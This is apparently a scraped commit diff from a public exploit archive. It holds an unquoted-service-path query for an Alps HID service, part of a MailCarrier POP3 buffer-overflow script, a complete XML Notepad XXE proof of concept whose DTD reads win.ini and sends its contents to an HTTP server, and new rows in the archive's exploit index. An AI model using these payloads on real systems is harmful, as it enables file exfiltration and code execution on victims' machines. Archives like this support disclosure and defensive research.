Alps HID Monitor Service ApHidMonitorService C:\Program Files\Apoint2K\HidMonitorSvc.exe Auto
C:\Users\user>sc qc ApHidMonitorService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ApHidMonitorService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Alps HID Monitor Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

2
exploits/windows/remote/47554.py
View file

@ -56,7 +56,7 @@ buffer = '\x41' * 5095 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 -
print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.121.87", 110))
connect=s.connect(("TARGET", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)

29
exploits/xml/local/47606.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection
# Date: 2019-11-11
# Exploit Author: 8-Team / daejinoh
# Vendor Homepage: https://www.microsoft.com/
# Software Link: https://github.com/microsoft/XmlNotepad
# Version: XML Notepad 2.8.0.4
# Tested on: Windows 10 Pro
# CVE : N/A
# Step
1) File -> Open -> *.xml
# Exploit Code
1) Server(python 3.7) : python -m http.server
2) Poc.xml :
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
3) payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
--------------------------------------------------------------------------------

7
files_exploits.csv
View file

@ -6589,6 +6589,10 @@ id,file,description,date,author,type,platform,port
47590,exploits/multiple/dos/47590.txt,"JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects",2019-11-05,"Google Security Research",dos,multiple,
47591,exploits/multiple/dos/47591.txt,"WebKit - Universal XSS in JSObject::putInlineSlow and JSValue::putToPrimitive",2019-11-05,"Google Security Research",dos,multiple,
47592,exploits/macos/dos/47592.txt,"macOS XNU - Missing Locking in checkdirs_callback() Enables Race with fchdir_common()",2019-11-05,"Google Security Research",dos,macos,
47607,exploits/ios/dos/47607.c,"iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC)",2019-11-11,"Sem Voigtlander",dos,ios,
47608,exploits/multiple/dos/47608.txt,"iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address",2019-11-11,"Google Security Research",dos,multiple,
47609,exploits/windows/dos/47609.txt,"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream",2019-11-11,"Google Security Research",dos,windows,
47610,exploits/windows/dos/47610.txt,"Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed OTF Font (CFF Table)",2019-11-11,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10757,6 +10761,9 @@ id,file,description,date,author,type,platform,port
47597,exploits/windows/local/47597.txt,"Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path",2019-11-07,"Mariela L Martínez Hdez",local,windows,
47599,exploits/windows/local/47599.txt,"SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path",2019-11-08,"Carlos A Garcia R",local,windows,
47601,exploits/android/local/47601.rb,"Android Janus - APK Signature Bypass (Metasploit)",2019-11-08,Metasploit,local,android,
47604,exploits/windows/local/47604.txt,"_GCafé 3.0 - 'gbClienService' Unquoted Service Path",2019-11-11,4ll4u,local,windows,
47605,exploits/windows/local/47605.txt,"Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path",2019-11-11,"Héctor Gabriel Chimecatl Hernández",local,windows,
47606,exploits/xml/local/47606.txt,"XML Notepad 2.8.0.4 - XML External Entity Injection",2019-11-11,daejinoh,local,xml,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139

Can't render this file because it is too large.